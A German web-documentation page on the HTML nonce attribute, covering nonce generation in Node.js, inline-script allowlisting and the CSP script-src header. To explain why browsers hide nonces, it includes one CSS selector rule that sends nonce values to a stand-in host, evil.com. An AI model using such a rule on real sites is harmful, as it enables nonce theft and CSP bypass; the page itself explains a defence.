HTML nonce globales Attribut

Das nonce-Attribut ist nützlich, um spezifische Elemente, wie ein bestimmtes eingebettetes Script oder Stilelemente, auf eine Positivliste zu setzen. Es kann Ihnen helfen, die Verwendung der CSP unsafe-inline Direktive zu vermeiden, die alle eingebetteten Scripts oder Stile auf eine Positivliste setzen würde.

Es gibt einige Schritte, um ein eingebettetes Script mithilfe des Nonce-Mechanismus auf eine Positivliste zu setzen:

Werte generieren

Generieren Sie von Ihrem Webserver aus einen zufälligen Base64-codierten String mit mindestens 128 Bit Daten aus einem kryptografisch sicheren Zufallszahlengenerator. Nonces sollten jedes Mal unterschiedlich generiert werden, wenn die Seite geladen wird (Nonce nur einmal verwenden!). Zum Beispiel in nodejs:

import crypto from "node:crypto"; crypto.randomBytes(16).toString("base64"); // '8IBTHwOdqNKAWeKl7plt8g==' 

Inline-Script auf die Positivliste setzen

Das im Backend-Code generierte Nonce sollte nun für das eingebettete Script, das Sie auf die Positivliste setzen möchten, verwendet werden:

<script nonce="8IBTHwOdqNKAWeKl7plt8g=="> // … </script> 

Senden eines Nonce mit einem CSP-Header

Schließlich müssen Sie den Nonce-Wert in einem Content-Security-Policy Header senden (fügen Sie nonce- voran):

Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g==' 

Aus Sicherheitsgründen wird das nonce Inhaltsattribut verborgen (ein leerer String wird zurückgegeben).

script.getAttribute("nonce"); // returns empty string 

Die nonce Eigenschaft ist der einzige Weg, um auf Nonces zuzugreifen:

script.nonce; // returns nonce value 

Die Nonce-Verbergung hilft, Angreifer daran zu hindern, Nonce-Daten über Mechanismen zu exfiltrieren, die Daten aus Inhaltsattributen wie diesem erfassen können:

script[nonce~="whatever"] { background: url("https://evil.com/nonce?whatever"); } 

• HTMLElement.nonce
• Content Security Policy
• CSP: script-src